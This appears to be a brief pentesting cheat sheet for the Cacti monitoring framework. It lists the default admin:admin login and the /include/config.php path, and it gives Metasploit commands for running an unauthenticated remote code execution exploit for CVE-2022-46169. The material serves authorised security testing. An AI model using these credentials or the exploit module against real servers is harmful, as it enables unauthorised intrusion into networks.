Cacti Pentesting

Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.

- [cacti-remote-code-execution_CVE-2022-46169](https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169)

Default Credentials

admin:admin


Common Directories

/include/config.php


Remote Code Execution (RCE) CVE-2022-46169

Reference: https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/

msfconsole
msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
msf> (set options...)
msf> run

We can also refer to Exploit-DB.